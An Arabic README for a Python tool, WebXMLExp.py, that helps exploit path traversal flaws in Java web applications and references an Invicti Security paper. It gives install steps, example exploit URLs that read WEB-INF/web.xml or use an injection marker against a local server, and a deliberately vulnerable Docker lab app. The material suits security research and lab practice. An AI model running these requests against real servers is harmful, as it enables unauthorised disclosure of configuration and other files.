
أداة للمساعدة في استغلال ثغرات اجتياز المسار (Path Traversal) في تطبيقات الويب المكتوبة بلغة جافا.
أداة للمساعدة في استغلال ثغرات اجتياز المسار (Path Traversal) في تطبيقات الويب بلغة Java.
تمت الإشارة إلى هذه الأداة في الورقة التقنية الصادرة عن Invicti Security استغلال ثغرات اجتياز المسار في تطبيقات الويب بلغة Java.
يتطلب تشغيل هذه الأداة توفّر Python3.
قم بتشغيل الأمر التالي:
pip install -r requirements.txt
بعد التثبيت، قم بتقديم رابط استغلال (URL) كما يلي:
usage: python WebXMLExp.py <url_with_web_xml_exploit_or_inject_here_marker>
تتوفر النتائج (الملفات التي تم تنزيلها) في مجلد results.
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml"
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=<INJECT-HERE>"
يتم توفير تطبيق ويب قابل للاستغلال بثغرة اجتياز المسار في مجلد docker.
للبدء، ادخل إلى مجلد docker ثم شغّل:
docker-compose up
يمكن الوصول إلى التطبيق عبر الرابط http://127.0.0.1:8082/vulnerable/.
لاستغلال ثغرة اجتياز المسار، قم بزيارة: http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml